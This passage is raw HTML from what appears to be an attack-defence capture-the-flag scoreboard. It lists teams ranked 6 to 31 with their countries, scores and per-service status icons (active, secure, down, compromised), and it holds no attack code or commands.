alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>6</td><td><img width="20px" height="="20px"" src="131.jpg"><b> ENOFLAG </b></td><td>DE <img src="de.png"></td><td><b>836.0</b></td><td>2</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>7</td><td><img width="20px" height="="20px"" src="158.jpg"><b> Pwnies </b></td><td>DK <img src="dk.png"></td><td><b>827.4</b></td><td>201</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>8</td><td><img width="20px" height="="20px"" src="194.jpg"><b> PeterPEN </b></td><td>RU <img src="ru.png"></td><td><b>671.8</b></td><td>10</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>9</td><td><img width="20px" height="="20px"" src="138.jpg"><b> FAUST </b></td><td>DE <img src="de.png"></td><td><b>644.1</b></td><td>1</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>10</td><td><img width="20px" height="="20px"" src="144.jpg"><b> HackerDom </b></td><td>RU <img src="ru.png"></td><td><b>602.6</b></td><td>3</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>11</td><td><img width="20px" height="="20px"" src="201.jpg"><b> Magic Hat </b></td><td>RU <img src="ru.png"></td><td><b>568.9</b></td><td>2</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>12</td><td><img width="20px" height="="20px"" src="208.jpg"><b> m0j0j0j0 </b></td><td>US <img src="us.png"></td><td><b>566.5</b></td><td>140</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>13</td><td><img width="20px" height="="20px"" src="178.jpg"><b> Bushwhackers </b></td><td>RU <img src="ru.png"></td><td><b>503.0</b></td><td>16</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>14</td><td><img width="20px" height="="20px"" src="186.jpg"><b> VUBAR </b></td><td>NL <img src="nl.png"></td><td><b>460.4</b></td><td>0</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>15</td><td><img width="20px" height="="20px"" src="157.jpg"><b> Chocolate Makers </b></td><td>IT <img src="it.png"></td><td><b>434.2</b></td><td>6</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>16</td><td><img width="20px" height="="20px"" src="195.jpg"><b> ufologists </b></td><td>RU <img src="ru.png"></td><td><b>418.6</b></td><td>2</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>17</td><td><img width="20px" height="="20px"" src="151.jpg"><b> Brooklynt Overflow </b></td><td>US <img src="us.png"></td><td><b>399.9</b></td><td>1060</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>18</td><td><img width="20px" height="="20px"" src="184.jpg"><b> squareroots </b></td><td>DE <img src="de.png"></td><td><b>363.9</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>19</td><td><img width="20px" height="="20px"" src="175.jpg"><b> CInsects </b></td><td>DE <img src="de.png"></td><td><b>351.0</b></td><td>9</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>20</td><td><img width="20px" height="="20px"" src="142.jpg"><b> Epic Lyons </b></td><td>FR <img src="fr.png"></td><td><b>348.7</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>21</td><td><img width="20px" height="="20px"" src="215.jpg"><b> SYPER </b></td><td>AR <img src="ar.png"></td><td><b>342.2</b></td><td>37</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>22</td><td><img width="20px" height="="20px"" src="192.jpg"><b> WildRide </b></td><td>RU <img src="ru.png"></td><td><b>341.5</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>23</td><td><img width="20px" height="="20px"" src="143.jpg"><b> blue-lotus </b></td><td>CN <img src="cn.png"></td><td><b>324.5</b></td><td>1</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>24</td><td><img width="20px" height="="20px"" src="150.jpg"><b> RPISEC </b></td><td>US <img src="us.png"></td><td><b>302.1</b></td><td>9</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>25</td><td><img width="20px" height="="20px"" src="166.jpg"><b> alcapwn </b></td><td>DE <img src="de.png"></td><td><b>301.2</b></td><td>11</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>26</td><td><img width="20px" height="="20px"" src="185.jpg"><b> SiBears </b></td><td>RU <img src="ru.png"></td><td><b>281.9</b></td><td>14</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>27</td><td><img width="20px" height="="20px"" src="170.jpg"><b> utmcs </b></td><td>CA <img src="ca.png"></td><td><b>253.2</b></td><td>1</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>28</td><td><img width="20px" height="="20px"" src="161.jpg"><b> Red Cops </b></td><td>FR <img src="fr.png"></td><td><b>248.4</b></td><td>8</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>29</td><td><img width="20px" height="="20px"" src="152.jpg"><b> Delusions of Grandeur </b></td><td>US <img src="us.png"></td><td><b>239.6</b></td><td>43</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>30</td><td><img width="20px" height="="20px"" src="197.jpg"><b> Tower of Hanoi </b></td><td>IT <img src="it.png"></td><td><b>225.0</b></td><td>143</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>31</td><td><img width="20px" height="="20px"" src="183.jpg"><b> 0ldEur0pe </b></td><td>DE <img src="de.png"></td><td><b>222.1</b></td><td>922</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" 